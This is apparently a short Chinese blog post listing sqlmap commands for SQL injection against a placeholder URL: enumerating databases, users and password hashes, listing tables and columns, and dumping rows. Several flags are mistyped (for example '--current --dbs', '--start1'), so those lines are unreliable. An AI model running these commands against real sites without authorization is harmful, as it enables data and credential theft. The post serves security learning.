sqlmap用法

sqlmap是一个工具,一个用来做sql注入攻击的工具,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。[[[] 徐焱 李文轩 王东亚,web安全攻防子工业出版社,2018.]]Sqlmap常用命令:
(1) 查看一共有几个库
python sqlmap.py -u “url” --batch --dbs
(2) 查看当前使用的数据库是哪个
python sqlmap.py -u “url” --batch --current --dbs
(3) 查看哪个账号访问的哪个库
python sqlmap.py -u “url” --batch --current-user
(4) 查看一共多少个账户
python sqlmap.py -u “url” --batch --users
(5) 查看当前用户账号和密码
python sqlmap.py -u “url” --batch --passwords
(6) 查看当前数据库的所有表名
python sqlmap.py -u “url” --batch -D 库名 --tables
-D:指定数据名称
(7) 查看当前数据库下某表名下的字段名
python sqlmap.py -u “url” --batch -D 库名 -T autolog --columns
-D代表某个库,-T代表某个表,–columns代表表中所有列字段
(8) 查看字段内容
python sqlmap.py -u “url” --batch -D 库名 -T autolog -C id,reqUrl,reqData --start1 --stop10 --dump
-C:可以指定字段 --dump导出
–start指定导出的开始的行 --stop指定导出结束的行

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值